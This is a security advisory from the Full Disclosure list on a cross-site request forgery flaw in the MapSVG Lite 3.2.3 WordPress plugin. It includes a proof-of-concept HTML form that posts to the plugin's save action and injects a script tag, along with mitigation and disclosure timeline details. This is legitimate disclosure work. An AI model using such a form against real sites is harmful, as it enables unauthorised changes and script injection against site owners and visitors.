Details ================ Software: MapSVG Lite Version: 3.2.3 Homepage: https://en-gb.wordpress.org/plugins/mapsvg-lite-interactive-vector-maps/ Advisory report: https://advisories.dxw.com/advisories/csrf-mapsvg-lite/ CVE: Awaiting assignment CVSS: 5.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:N)
Description ================ CSRF in MapSVG Lite could allow an attacker to do almost anything an admin can Vulnerability ================ The plugin uses REST requests to modify post data, and does not check the nonce when doing so. Proof of concept ================ Install the plugin on a site at http://localhost/ Ensure you have page with ID of 2. Whilst logged in, visit an html page with this content and submit the form: <form method=\"POST\" action=\"http://localhost/wp-admin/admin-ajax.php?action=mapsvg_save\";> <input type=\"text\" name=\"data[title]\" value=\"A bad value\"> <input type=\"text\" name=\"data[mapsvg_data]\" value=\"<script>alert(\'hello\')</script>\"> <input type=\"text\" name=\"data[map_id]\" value=\"2\"> <input type=\"submit\"> </form> Visit the page with ID of 2. It now has title of “A bad value” and alerts “hello” on loading. Mitigations ================ Upgrade to version 3.3.0 or above. Disclosure policy ================ dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://advisories.dxw.com/disclosure/ Please contact us on [email protected] to acknowledge this report if you received it via a third party (for example, [email protected]) as they generally cannot communicate with us on your behalf. This vulnerability will be published if we do not receive a response to this report with 14 days. Timeline ================ 2018-04-10: Discovered 2018-06-15: Author notified via email 2018-06-15: Author replied, fix to be published in next release 2019-01-08: Advisory published Discovered by dxw: ================ Rob Skilling Please visit advisories.dxw.com for more information. _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
